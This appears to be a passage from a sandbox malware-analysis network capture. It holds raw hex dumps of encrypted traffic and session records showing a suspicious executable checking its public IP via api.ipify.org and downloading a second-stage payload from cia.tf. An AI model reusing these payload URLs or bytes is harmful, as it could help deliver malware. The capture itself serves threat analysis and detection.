2024-11-25 13:47:40 UTC	408	IN	Data Raw: 18 97 a6 18 25 50 a5 1d e9 1d 0c c1 78 7f e5 64 91 44 9c 37 53 f6 28 77 08 35 29 a5 19 5d 43 6a 8c 80 58 6f 08 28 e9 b2 1d 79 f3 12 d1 4f 7a 51 90 52 be 17 50 7a 46 e4 aa 35 bc c4 14 e1 62 06 68 a2 38 81 69 a3 fb 35 64 9b c1 92 7b 31 f8 72 d3 e0 81 ff 8c 5f 72 a8 f5 c5 aa fc 7f eb 1c 45 01 8b 0d 4a 2e 75 87 34 f7 e8 05 b7 c7 f0 f6 0b 13 c8 3f 0c aa 06 8f 35 a1 c3 5e ae 8a b1 f2 af e4 fb a7 12 32 99 8f 5d a8 8a 17 77 17 6a 20 52 9c 99 e3 f8 30 7c b9 e4 17 8a d8 4f 34 95 2f c8 dc 85 d7 9f 7e 09 d9 7e a7 a9 f6 54 2d e4 a6 a2 4c f0 66 7d 00 88 64 c7 5f 7e e8 96 c6 ab 09 bb 0c 72 7c ec f9 c4 36 fe b9 7f 92 3e 6b 55 41 35 57 04 eb 74 8a 30 25 7e 6d 2f 7c 29 72 4d d0 52 e8 93 0b 41 a0 d6 83 82 a3 32 9e 9a db 5c e7 39 a7 e5 a3 8c a4 a0 49 1f 1a 46 6e a7 db e9 ae Data Ascii: %PxdD7S(w5)]CjXo(yOzQRPzF5bh8i5d{1r_rEJ.u4?5^2]wj R0\|O4/~~T-Lf}d_~r\|6>kUA5Wt0%~m/\|)rMRA2\9IFn
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: f9 a7 1e ab f5 ee 9c 60 87 a3 bf 8b 66 34 c8 99 3d df b8 ed da 6f 2b fc c8 7c 62 67 3a b6 98 5c 3b 7e e8 5b 03 18 cc b3 58 30 bf 16 89 41 c0 c5 ee 47 0a 43 bf 57 ed 9b 0c 9a 6b 52 8f 31 af 4b 14 23 fd 55 e2 ce 55 c3 e1 ba f3 86 78 25 56 fa 72 d1 d3 45 30 f1 df 75 4d 0f e4 06 71 1b f8 da 49 30 0a 4f bd a2 76 cd c6 40 8f 54 0a 97 6f 59 9e e8 bb 38 d4 0a cb 14 09 17 30 9e c7 ef 88 76 90 6d 7e 87 1b 2c 7c e7 9d 8d e8 22 3f 1e a2 64 de 85 0b 09 e2 38 5c 19 3b 7e d7 5f 6a b9 d4 f8 39 8c 93 36 5b 72 ac 5b d4 cf ee 66 e8 17 bf 09 24 a7 02 83 dd 43 2e f4 0f cd f4 ed 38 b4 90 dd 4b 75 86 dc ee 00 c0 81 a6 7f 6e 69 f6 ff 9a f9 c2 3e eb e5 82 6e 9a e5 d2 0d 23 93 42 7f ba 16 ce 69 c9 50 5e 0e 9f 23 d1 3c 84 00 91 9e b1 2b f8 06 9a f0 d6 96 eb e8 cc cc 77 72 6e 2e 26 Data Ascii: `f4=o+\|bg:\;~[X0AGCWkR1K#UUx%VrE0uMqI0Ov@ToY80vm~,\|"?d8\;~_j96[r[f$C.8Kuni>n#BiP^#<+wrn.&
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: c1 1b b2 3a e3 f3 21 1a c3 6d 1f 5a 83 2d 37 a3 d1 8d 81 2a 7a 46 e6 06 9a 1f b6 50 03 1c 96 0d 28 be 88 3a 09 6e 58 aa 26 57 4d d5 3d 5b 7a bd 9e 7e 88 20 7f 4b 88 22 86 c8 01 6a 8f 70 bd b1 bb 61 c7 89 e4 f1 8d de 06 d0 4b 35 53 60 9b f1 eb e5 bb f6 e7 40 82 ae 94 c7 d9 0c 29 ae 38 c9 41 37 c8 6a f3 c4 93 2b 2d ec d0 64 a0 92 7c 3f a4 cd 2c 62 c9 ad 40 68 f9 ab 58 71 7c 3a d8 43 35 c5 61 68 38 46 ef 76 62 51 4c b8 0f c1 ec f2 e0 b8 40 e2 9a 0d 94 14 96 e9 40 f6 89 8e ef 82 65 17 23 0a a7 48 18 cb 15 58 5e 07 93 36 ff 86 16 49 d2 43 ad 71 7c c7 25 4c 07 55 33 18 94 0d 43 f3 36 32 e6 69 13 5b 5d 6f ab 36 8c e0 cb a1 24 ed 27 c5 f3 0e f6 04 d7 f2 f4 99 f3 d4 65 43 67 a8 34 2e 5e ad 55 c0 79 73 62 22 8c c6 a2 2d a6 1b 35 d8 8a 53 f3 04 48 b0 ba 0d 0d 87 48 Data Ascii: :!mZ-7*zFP(:nX&WM=[z~ K"jpaK5S`@)8A7j+-d\|?,b@hXq\|:C5ah8FvbQL@@e#HX^6ICq\|%LU3C62i[]o6$'eCg4.^Uysb"-5SHH
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: 1e 38 be 05 4a ce 52 e0 84 90 39 b1 28 5e c7 cc 38 a0 af 60 b1 1c 41 40 8e 08 70 31 0d d1 e0 08 c7 86 63 73 04 98 8c e7 9c c3 c5 f4 60 8c 09 de 75 7f 02 c6 ca 34 d3 29 2e b0 ce f0 88 29 e1 94 40 65 57 e3 b5 7e 22 aa b9 10 24 a3 1f fc 38 f4 83 cb ec eb d8 5d a3 10 2e d3 73 78 e9 22 d7 6d d1 9e 16 35 d4 02 3d a3 67 76 bd 6f 3d 2b 4b 49 03 6e d5 4e 2e f4 4d 6d b3 3a ac 2d ae c2 d9 8e 2e 40 45 ab 1b c0 0d df 20 7e f1 be 3a a0 e7 76 9c 14 ba c7 11 09 1f 3f f8 7f eb 02 b6 94 fa e1 02 17 3d 82 1b c5 00 e2 42 b8 b5 83 ae 23 a4 c1 d8 51 bc 8d 1d d9 24 d4 6a b7 7d 5d e8 80 f1 6b 97 17 6e 88 d8 fc 70 d2 7e cf 47 b1 56 9a 32 ea 9c 62 11 74 8a 44 99 f7 c5 68 90 a0 7b 25 9f 21 92 33 f4 d9 b2 cc 7b e8 32 4b d5 fc e8 bc 23 e2 83 48 8a 69 4f 2d 59 b8 3a 16 8a b0 48 60 e8 Data Ascii: 8JR9(^8`A@p1cs`u4).)@eW~"$8].sx"m5=gvo=+KInN.Mm:-.@E ~:v?=B#Q$j}]knp~GV2btDh{%!3{2K#HiO-Y:H`
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: 21 13 d4 d7 cc 0e cf 91 6a c7 d3 09 0f 1a f7 6b 10 0e e6 32 99 7f b9 02 1f b0 da 53 cc 28 53 2b 7b 17 52 d5 e8 ac 53 c5 7d 8b dc 2f 7e 3f f1 39 f4 d8 35 bc 47 a3 26 a0 6e 53 46 67 98 92 06 34 81 9e e6 8d 20 6e bc 5c d4 a7 42 23 53 f5 09 18 4f 76 ac 67 05 a3 2f 03 80 51 9a 3e 57 43 32 f5 5c 1c 61 ce 0a dc 06 a6 cd 91 c1 0a 2a 9b 5b 2e 96 03 e4 12 bd 51 1b 22 72 b1 5d 99 aa 1d e3 cd dd f3 fd 23 0d ed 40 14 d4 e7 01 07 dd ad d2 6f f3 7b 7c fc bb df bb ad 08 9e 04 8d 84 d8 ed 80 48 2a 0a 24 49 0f c5 53 f8 51 9f ef f4 f4 af b0 33 cd dc 54 4d e7 bc e9 ca 5e 18 fd be b5 54 09 09 33 5c 22 79 df e5 37 92 8d 20 7e d2 dc 1a d3 71 89 c3 23 a3 f7 08 f7 cf ed d6 ba d0 6a bf e8 25 c7 b8 7d d2 12 67 55 c5 b3 25 89 70 46 79 a5 2a 30 1f 7c 56 7d a4 c3 cd 3a 4a b0 c6 94 f1 Data Ascii: !jk2S(S+{RS}/~?95G&nSFg4 n\B#SOvg/Q>WC2\a[.Q"r]#@o{\|H$ISQ3TM^T3\"y7 ~q#j%}gU%pFy*0\|V}:J
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: 5b 3a c5 51 82 3f 3d 20 f0 d3 92 6a a4 1b a4 69 42 de aa 9a 99 c3 4a bc 4f d4 d2 27 7c 3a 5f 7a 30 4d 99 32 3a 6a fe cb c5 04 40 52 cf 90 3c 06 03 aa ad f1 ee 60 19 8b 62 69 d1 b7 6f 65 37 31 e5 4a cf 0a 4b 17 7d 5e a6 62 b4 24 ba cb 3d 32 c0 31 82 40 80 64 31 7b 7e 77 8d 44 13 5b a4 69 6d 7d 82 c0 80 cf 75 ac ba 38 61 0b 07 dc 7f 25 62 2f de cf 8a be 27 e0 07 af 8d d5 bc 14 d8 d6 c1 ab 63 15 27 89 fd bd a7 93 9c 07 2a 11 97 18 b6 d4 7c 57 d9 8d 3c 73 d8 0e 75 40 94 3e 50 95 f6 dd 22 fe a7 bc 17 91 e4 56 bc 48 ed 03 47 8e 0a 1f 10 e4 08 88 bc 04 5e 02 5b 03 04 f3 a5 de da 4b a8 c0 10 b6 f4 1e de c6 0f 1a 6f 4e 6e 24 a2 e4 25 c5 04 9b f4 c3 dd a8 4e fc 0d 09 9e bc 18 50 02 32 70 32 0d 28 ff 91 2a 91 cc 3d a8 83 0e db 77 9b cd d5 62 06 2d 83 12 48 51 ac 52 Data Ascii: [:Q?= jiBJO'\|:_z0M2:j@R<`bioe71JK}^b$=21@d1{~wD[im}u8a%b/'c'\|W<su@>P"VHG^[KoNn$%NP2p2(=wb-HQR
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: eb aa 36 57 87 bf dc ae 8b b7 e1 87 a2 97 ab 5a a8 4c d5 60 a3 1f 6d 7e 6f 8b ae 9f 54 4a a7 17 fb c3 bb 1e 56 3c e9 9d 9f 18 8c 86 c7 72 2f a9 9a b1 55 4f 4f 4c 3f ea 3b 17 6d c3 ce 66 ae 10 38 1a 32 8b 40 6d d4 dd 7a 20 68 da 21 ac dd 21 af 67 d3 13 ff e5 c2 20 d6 dd 30 a8 ba 66 a4 c5 5b 7f 81 45 e5 e5 58 20 be 63 22 0f 2f 58 4c 8f 76 0c 39 ca cd bc 2b 49 ea 6c d9 2d 13 08 07 29 95 34 35 46 a3 b5 e6 ec b1 22 06 fe c9 e5 18 87 25 51 1d ad df bd be 09 55 fe 23 b2 81 54 9c 74 0f 54 51 4f 2d f0 40 6c 00 c9 f0 e9 7e c9 af 01 28 4a 50 87 59 69 e0 b8 d5 6f 87 20 f2 dc 93 a0 6a c3 2a ff 07 60 c0 65 4a 6d f3 36 d8 21 d8 49 f9 1f 5b d1 58 40 81 db db 2c 6c 09 7e a3 b4 62 74 49 34 ba 81 27 6b 13 93 c9 7d 3e dc 5e 0e 18 ef 65 a9 0d 19 b1 d8 4c 93 e9 6b 80 3c 93 a7 Data Ascii: 6WZL`m~oTJV<r/UOOL?;mf82@mz h!!g 0f[EX c"/XLv9+Il-)45F"%QU#TtTQO-@l~(JPYio j*`eJm6!I[X@,l~btI4'k}>^eLk<
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: d0 d7 5c 2c d6 bc 5e c3 84 74 82 de 36 34 c4 85 ff aa b8 96 47 4f cc 27 85 a9 80 0c a1 f6 65 5b 6c 38 3e 17 06 34 95 84 2f 96 0a ee 74 cb 0c 35 92 2c 75 78 61 bc 0a cd 17 32 48 f5 0c ec 46 33 08 14 58 b0 57 8e 06 3f 91 3f cd f0 83 89 4f fd 17 4d 62 cf 4a 6c 38 fa 9d 9d c4 09 f1 52 75 75 cb a2 b8 ce 2e 0a f6 0d 5b 9a 13 8b 0d f5 77 30 65 1c 8e 35 49 3f b5 b6 73 16 f4 77 e4 9e ae 87 74 3c 4d e2 03 db 6c 1e 8e 53 45 01 72 1a 72 30 b7 06 78 cf c5 e9 99 71 70 72 2f a7 d4 8b 22 b8 d2 13 99 8a 90 80 d5 a9 a6 52 c5 e8 de ce 29 2f 1d 02 36 21 c3 33 54 22 21 4b 29 bc bd 5a cd e0 ca a5 ff 30 1c 3f e6 07 99 f4 d5 dd 88 8c 22 08 de 80 ea 36 5b 3f 8d 12 44 15 f0 35 52 1e a4 7f 8d 66 ce e2 cf 1f 81 81 2c ed de b8 1b 1b cc 2a 36 dd 4a 0e 9f e5 09 da 99 f6 a7 a2 65 1e 65 Data Ascii: \,^t64GO'e[l8>4/t5,uxa2HF3XW??OMbJl8Ruu.[w0e5I?swt<MlSErr0xqpr/"R)/6!3T"!K)Z0?"6[?D5Rf,*6Jee
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: 31 ae 58 6d b7 87 f4 fc 09 60 c0 ca 2d 0a 87 af a8 1b 9f b2 ba 5d 34 e9 35 0d c5 1d ce 33 36 53 65 dc cd 37 0c ef 29 73 1d 87 3e 3b 90 e8 10 8f cc 92 4f ef 75 84 3b 6c 12 64 8f 2b 0b 2e 0b 45 e4 59 3e 8e 25 52 a1 fd 09 5a c6 14 bc 98 ca 55 fa a1 2c 15 ce 43 6d 1f 06 3e 4f 37 78 9d bf 53 b5 2e 5a c0 ca 20 cd 2b 13 fd c2 0a 43 2e 88 9c 15 b3 4d 73 ab 9e c3 82 63 5e 94 ec 69 18 26 cc 02 d5 ca 01 1b 7f 49 c3 5c dc 3f 17 38 cc 8f 8b 48 ab b5 4d 67 c0 fb a7 ea 8c 8c 16 0a c2 c5 a9 a8 02 67 8e 4d 2b e7 b2 78 ee 52 9f 8a 1c 26 e3 5b 2c ff 99 97 86 29 d8 c6 75 b8 ac 3c f9 90 26 5c f1 0b d2 53 38 2b 16 86 46 00 18 bc c9 0d 61 11 f2 15 31 ea d4 fb 76 ae ca 31 f8 37 3f db 50 88 23 26 24 cb 60 e8 41 4e ad 0c ae db d9 7c d4 2e 05 a7 dd 52 1a c6 b4 f1 00 de 9a b3 ca eb Data Ascii: 1Xm`-]4536Se7)s>;Ou;ld+.EY>%RZU,Cm>O7xS.Z +C.Msc^i&I\?8HMggM+xR&[,)u<&\S8+Fa1v17?P#&$`AN\|.R
2024-11-25 13:47:40 UTC	1369	IN	Data Raw: c0 32 9f ae e8 9e 5b 7c 75 88 bd 80 27 1d 04 8e d4 8f 4f 74 f5 3b cd 4a 39 44 aa 8f e9 ce 84 e7 f7 67 05 65 0e 40 08 68 d8 c5 43 50 d4 8f a9 a9 63 bb f6 e2 a7 45 bd 08 60 44 2c fc b5 9e 71 68 65 ab 10 08 3d 87 70 96 97 74 7d 41 bb fb 31 ff ed 4e 23 35 6f 7e c4 da a7 79 06 1b bc 21 77 3b 69 c2 88 10 de 8e 6a 9d ba 2b 1b a3 30 4f 64 4b 26 8a 2d 9b 48 2c 76 af d5 b5 d0 46 fd f5 9e 7e 1c a2 3b e0 45 70 ea e1 4e ae 0c fd 0d 91 c7 8f ed 73 5a 57 4f 46 86 f6 08 1d ef b0 46 01 c2 71 ab 19 40 23 73 e3 5d 67 9c 26 57 cb 1f 6a 79 ef 35 a9 64 7f 5d 52 2f 39 ac 73 47 1b fa ef a9 f1 77 7d 32 c1 38 ed 59 d8 e2 7a 33 49 13 07 b4 1f 4b 76 a9 97 aa 24 1d 20 3b cf 82 6b b8 01 b1 6f 27 66 e7 75 be da 21 de 1f 95 b2 02 3d 5a bd 81 4a 38 07 e1 d8 50 84 ae b9 d5 61 31 58 84 ca Data Ascii: 2[\|u'Ot;J9Dge@hCPcE`D,qhe=pt}A1N#5o~y!w;ij+0OdK&-H,vF~;EpNsZWOFFq@#s]g&Wjy5d]R/9sGw}28Yz3IKv$ ;ko'fu!=ZJ8Pa1X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	104.26.13.205	443	7912	C:\Users\user\Desktop\Ref#2056119.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:47:40 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-25 13:47:41 UTC	398	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 13:47:41 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e82178def3c0f6d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2611&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4182&recv_bytes=769&delivery_rate=230629&cwnd=252&unsent_bytes=0&cid=0577f0e3e04f5444&ts=505&x=0"
2024-11-25 13:47:41 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	172.67.129.178	443	7236	C:\Users\user\AppData\Roaming\ishon.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:47:51 UTC	92	OUT	GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1 Host: cia.tf Connection: Keep-Alive
2024-11-25 13:47:52 UTC	956	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 13:47:51 GMT Content-Type: application/octet-stream Content-Length: 1127432 Connection: close accept-ranges: bytes Cache-Control: public, max-age=0 content-disposition: attachment; filename="Dhykdmlsc.vdf" etag: W/"113408-19362e45d6a" last-modified: Mon, 25 Nov 2024 10:35:53 GMT x-powered-by: Express cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qjQTGe4eRaeRp0DKYF5tRbdts3tXQx2E0kLqaFpjdu3M533cuT8VY3qsVQkxbOI3qifTYSEoqhKGwdHCX3j9KOQ6h5H7aad6928KmjZ9rMJquNdF44vA%2Ffc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8217ced9900f89-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4156&recv_bytes=706&delivery_rate=200329&cwnd=235&unsent_bytes=0&cid=c83eda0111646f15&ts=982&x=0"
2024-11-25 13:47:52 UTC	413	IN	Data Raw: 17 10 9e 68 50 d7 40 e0 46 27 2a 8b 31 0f 2b 36 e9 67 6e 9c 96 60 58 78 bc 6b c3 1d 44 35 20 17 9b 57 f4 42 c1 51 55 05 da 44 cb fc 7a 35 71 c1 7c 03 f9 de 00 c6 1a 63 12 8a 68 e9 38 e3 99 36 dd bd 53 7f 7d 53 30 27 26 0a ce 1b c2 65 f2 bc 2f 70 98 11 98 20 9e b2 c6 78 a9 4d 79 91 fa 11 26 f4 5f c7 14 4b bc 42 d1 8b 1f e3 9f d5 9c 43 cd 7a f4 fb a3 dc a0 4a f3 39 b4 e2 49 22 37 6f 1c 06 bb 56 e0 f2 43 d9 75 7d c1 cd 8d d7 be 14 91 14 44 9d 32 1e cd bb 92 b9 9d b5 56 00 85 18 5f 77 b3 68 bc 3a 60 72 9f e2 85 67 a1 99 0d 0d af a6 56 89 8c 03 e5 35 a1 60 62 8d 2c 09 e5 27 3f 1c fe 74 c4 9a 15 b4 16 0e 68 d5 67 7f df 9f 6b d9 f9 7f 9f 76 41 ad d5 55 d0 c2 11 6f f1 36 b2 aa 8c 1b e6 8b df 4f 1a fc 58 68 d1 10 67 5a 31 97 22 bd 50 4f 9c 0f e6 77 e8 56 8b 23 d0 Data Ascii: hP@F'*1+6gn`XxkD5 WBQUDz5q\|ch86S}S0'&e/p xMy&_KBCzJ9I"7oVCu}D2V_wh:`rgV5`b,'?thgkvAUo6OXhgZ1"POwV#
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: 11 40 0e d1 73 4f b9 a9 40 02 2c 0b a3 a8 15 2a 8e 57 ce ab d6 6a 4d d0 0f f9 b1 be 6c 25 70 c8 9a aa 87 95 20 f8 b9 84 68 7b 51 27 5e a0 31 3c 4a ef 28 c8 de 68 f8 d7 7e a5 4a 55 4a ab bc 30 f0 09 8e f0 0d 9c 16 1a a6 93 dc 14 79 4f c6 ba 1d d7 b1 7c 38 5d cc b9 72 bc c6 da 73 50 a6 78 e1 b9 52 75 68 f2 5b ef 32 e9 ad 4f 0d 8f c8 78 28 d2 17 6a 02 4a 7a 0a 83 2d e8 18 26 f7 fd 3f 33 2b 05 b8 74 9c 3b 01 55 cd 35 a1 9a 7f 25 5c ac ad 83 d4 be 58 af ae 65 00 14 dc 9c c0 53 f1 80 c7 a2 65 71 e2 6b 47 b2 98 df c3 52 3a 63 c0 19 fb cd 00 1d f6 e5 83 22 2d 55 9b e5 89 89 8f 6a 32 cd 6d 97 f1 7b 21 0d fc cc 89 83 70 3b 2d d0 df 78 32 de 35 02 ac a2 c3 43 6a fd 3b 43 60 ee f7 23 04 cb 79 6b e2 5f 4d 28 8b 33 db a2 3d 62 b4 7b b3 5a ee 2f 23 da d0 1b 4a bf 4d b7 Data Ascii: @sO@,*WjMl%p h{Q'^1<J(h~JUJ0yO\|8]rsPxRuh[2Ox(jJz-&?3+t;U5%\XeSeqkGR:c"-Uj2m{!p;-x25Cj;C`#yk_M(3=b{Z/#JM
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: 79 86 43 f1 c3 fa 1d 9d a8 63 7e 13 b9 4f 6a 43 07 d0 48 b4 bf 0f a4 df 78 34 6e a8 6d fb ff a4 34 06 c6 01 00 e0 5c d5 d3 aa 96 d6 61 41 c2 13 e3 ed 2b 84 6f c2 e8 d3 41 13 cd bf 8c 1f c6 f1 72 3b 59 34 26 ee dc e6 61 12 18 db 56 3f 70 99 47 71 29 48 28 1f 0a b5 ba 4f 23 0d 1b ac 77 5c 27 bb 7d c1 74 82 f4 6f 8d a4 6b 72 a2 89 bf bc 52 8a bc 52 5c 01 5d 09 f8 8e d6 4f a4 9e a8 87 87 6a f1 0f 93 ea e5 df 16 bf 72 50 91 9c b3 b7 15 58 02 36 a1 cd 5f 64 28 ad b0 3b 72 ba 2a e1 fe da 1d cd 61 d0 99 94 11 67 34 fd 05 61 5c 4c 4c 7e 2f 66 16 b1 f0 53 0d b2 e1 36 73 a6 f0 23 ef 52 c3 b2 75 3e 3d e5 d6 8c e8 b1 1f c4 e6 35 c7 21 4e c9 5d d8 5c e8 ca 1c d5 38 aa a1 1d 0b 9f e8 cb 0a 54 f4 bf 44 d4 4f cf 1f ca c7 33 b8 4e 90 00 84 42 bc 0b bd e6 58 6a 07 51 26 8f Data Ascii: yCc~OjCHx4nm4\aA+oAr;Y4&aV?pGq)H(O#w\'}tokrRR\]OjrPX6_d(;r*ag4a\LL~/fS6s#Ru>=5!N]\8TDO3NBXjQ&
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: e8 a7 43 21 3a be 5d 81 4f 25 36 6e a0 97 ba d0 36 2d 5d a8 cf 97 49 1a e7 ae 6d a9 4c 84 f8 80 62 cc ba 71 9d 13 aa 14 96 6e 33 4b d3 ea b3 b1 6e dc bf 6b f6 0f e2 49 e6 2d 25 42 b4 8d 6c de 19 5c 82 86 23 b8 38 15 b2 28 63 56 a8 bb d0 a6 f9 a2 34 32 66 a9 c4 e5 db 29 75 53 de a9 15 86 3c c1 e6 c9 af 32 ba 65 fe de 0a 9e 34 b0 0f 8f d3 76 31 c5 68 07 ce 17 8e 54 62 75 74 63 67 06 7c 0f aa 93 c9 ef f2 1d 8a 35 2c a2 85 e9 3f f3 c2 1c b9 e7 78 c3 98 f9 81 88 a3 2c 1d 23 38 e6 30 08 a1 61 46 99 5f bf 0f b7 cf ba 1d ef 68 96 52 eb a5 5e 70 1a c7 b7 11 64 29 61 6a 98 03 30 bd e0 1d e2 05 86 0c 8a a7 78 ed a7 3c 15 4d e1 28 7f b0 ba 32 31 83 55 61 a2 db 07 68 c2 65 bc b3 a5 4d e5 fa 29 3f ce 2e 98 95 c9 b8 b7 a4 ba c9 25 d9 50 dd 56 ba 6f 19 32 32 85 ea bb b2 Data Ascii: C!:]O%6n6-]ImLbqn3KnkI-%Bl\#8(cV42f)uS<2e4v1hTbutcg\|5,?x,#80aF_hR^pd)aj0x<M(21UaheM)?.%PVo22
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: 79 99 d0 8b 71 a9 b0 41 50 03 fb f6 f5 06 00 05 f0 e0 27 f0 d5 52 2f fa 6f 57 53 f7 00 72 d9 40 b6 07 07 c0 be 70 d6 2b 71 39 46 50 4d 00 12 33 a0 8e 1c 09 ef 94 68 a7 b6 e5 52 fd 7e 47 c1 87 3d 62 12 d5 c8 6d ad 4f 98 ec 35 23 31 a4 88 10 51 6e e5 49 ba 2e af ef cd 03 b6 e7 1e 90 65 c7 3f ff 41 ab b8 76 ee 48 b8 ce aa 52 ce f8 bf 57 a6 8b 30 1d 5a 54 e4 73 17 ec 8c 94 6f 9a de 19 b4 fc 1f 68 cf 4e 69 f5 36 df 0e 35 af 65 8a 28 35 b0 82 6a 2e 58 b8 c0 47 8b f7 63 d5 9c ac e3 af 4e 5f 2a 1b 39 89 30 1b 91 54 98 f0 bf 0d 58 75 fc b9 8e ae ef 83 9c b2 01 2f ba fd f3 44 53 ac 18 f7 8d 2b 2b 88 a5 78 43 4d c6 64 6f 18 5a 12 f1 98 9c fd a2 ed 60 68 32 08 8b 3a 2a 0c de a6 5f dd 54 f5 cf 9a 88 3e 60 1c 7c 93 54 77 2a 05 b9 fa b7 10 c7 7e 2e 98 86 1d 19 49 70 cd Data Ascii: yqAP'R/oWSr@p+q9FPM3hR~G=bmO5#1QnI.e?AvHRW0ZTsohNi65e(5j.XGcN_90TXu/DS++xCMdoZ`h2:_T>`\|Tw*~.Ip
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: 34 5b 74 9c db 4e ee b4 78 19 a1 b2 ee 45 c0 63 6a 7a ab 2d eb 4f 8b d6 33 67 b3 74 74 2c 07 84 f2 17 37 04 52 d9 39 69 72 86 90 70 ac 13 5f c8 cb 96 7e dc be 15 2c 25 cc 34 28 fb 0d 77 da 5f 0d a3 49 c0 a6 37 ff 7f 14 84 4f 95 a7 c0 aa 9a 02 f1 69 1e e2 b9 65 05 db 6a 63 fe 32 2d 4c d1 de 81 9b 8f b6 58 1b 5c 39 21 77 49 21 59 53 30 89 10 d0 64 d0 13 be 9f 97 23 21 3c 7d e7 d5 2b 5a 5c 83 ca 84 df ec 26 1c 43 9f 3d 78 1f 52 c8 6a 70 27 d1 3c 62 cb 80 b1 e4 14 d6 e4 8c 54 f6 16 79 64 c6 69 0a 70 74 6a 77 37 71 d0 e5 e7 5d 3b 62 08 b3 d9 a8 da 5a 34 76 0e e7 0b 55 a7 11 c2 03 cd 94 55 ef 9f 61 2e e7 43 af 0b 71 b6 84 20 2c a0 6e ae 1b 0d 76 e5 51 ae 0d 2d 95 9c 85 02 c1 b5 16 ce cb 40 9e 00 5b 7a 94 36 eb 7e 15 93 96 22 ff d8 d8 3f 77 fb 99 e8 4a 0d 2c 05 Data Ascii: 4[tNxEcjz-O3gtt,7R9irp_~,%4(w_I7Oiejc2-LX\9!wI!YS0d#!<}+Z\&C=xRjp'<bTydiptjw7q];bZ4vUUa.Cq ,nvQ-@[z6~"?wJ,
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: 75 0a 4a 2b 9d 24 35 21 ca e8 58 f8 ac e6 8c bb ff 77 73 09 b8 88 6c 50 58 7b 42 6c ce 68 4e e1 61 b5 33 48 08 26 61 a2 0a 07 c5 a0 cc d2 46 47 c5 56 65 08 62 55 cc 92 49 70 fe 9c 86 ba f5 95 bc c8 85 df 3a b4 a9 6b 98 e9 59 88 11 4e 33 19 69 fa 37 99 2e ba 67 1e ff d3 82 5d 6c f2 3f 51 c2 e3 46 ac de e5 19 e0 b9 b8 23 7f 05 9d ec 42 af 1f f7 8e 42 7a 9e 49 cf 67 35 68 f1 09 9b e4 91 e7 83 90 22 f5 ea d3 64 4c 28 b0 c5 d3 ed 02 2b 91 25 29 49 41 18 d4 f3 c4 03 61 f7 5c 14 73 94 61 d3 55 56 50 6c 43 c9 77 81 f0 2e 9d 53 5a 80 0b 67 a5 7a 77 9c 60 56 14 c0 dd 7d 00 3a 7b a8 43 57 32 08 89 2b f5 ae a8 a7 ce 4e ea 23 10 d7 28 23 90 73 50 26 34 dd 30 60 5a 57 29 c9 9d 4b 1f 2b 34 c8 5d 2d 09 ab 0a 76 db aa e6 9e 6a 2e 71 6e fa fd 71 96 10 02 f2 01 03 94 66 b4 Data Ascii: uJ+$5!XwslPX{BlhNa3H&aFGVebUIp:kYN3i7.g]l?QF#BBzIg5h"dL(+%)IAa\saUVPlCw.SZgzw`V}:{CW2+N#(#sP&40`ZW)K+4]-vj.qnqf
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: cf 7e 55 dd e2 c6 1f 24 d6 7a 97 a4 f5 e6 51 13 a1 b1 b5 91 84 00 2c 41 25 c7 e6 a5 f3 6d bc 36 fc d4 79 df 2d ca e1 7a 6a 64 e8 12 14 39 0d e8 d4 b3 55 2b 41 27 4d 6e 06 22 a6 41 5c 2a 60 aa 9b 57 57 f2 89 99 e8 c0 1f e1 f0 80 ff d9 a5 67 01 b2 15 ed eb 79 66 ea 36 8d 0c 11 c4 e6 6d 06 29 e2 a0 54 95 98 d1 27 e5 b8 9c 84 42 d6 1f fd 03 a3 55 c6 98 e4 f9 57 7f c9 0d c6 51 17 08 e8 33 16 39 37 0e 00 18 e3 fc 5b 86 a3 61 b5 4a 28 6e 26 2f 42 22 05 18 bc a9 54 56 a5 e3 e7 9a e4 fb 8c 42 67 0a fa f3 96 ea 9c b1 b2 b9 06 d0 53 8d db f9 a6 81 b8 e2 b5 97 0a c8 db bd f2 71 48 7b 00 c9 b7 20 00 2b a4 17 3e bb 22 b4 c1 4b b4 de d3 cc 38 d9 80 f0 db 8c a2 fa 06 5a d9 16 88 5f b0 2e 8a 28 84 de c0 20 ae 99 e7 8c 01 3f c4 b9 4c 26 2c 18 c8 c6 68 07 8d e5 c8 97 9f aa Data Ascii: ~U$zQ,A%m6y-zjd9U+A'Mn"A\*`WWgyf6m)T'BUWQ397[aJ(n&/B"TVBgSqH{ +>"K8Z_.( ?L&,h
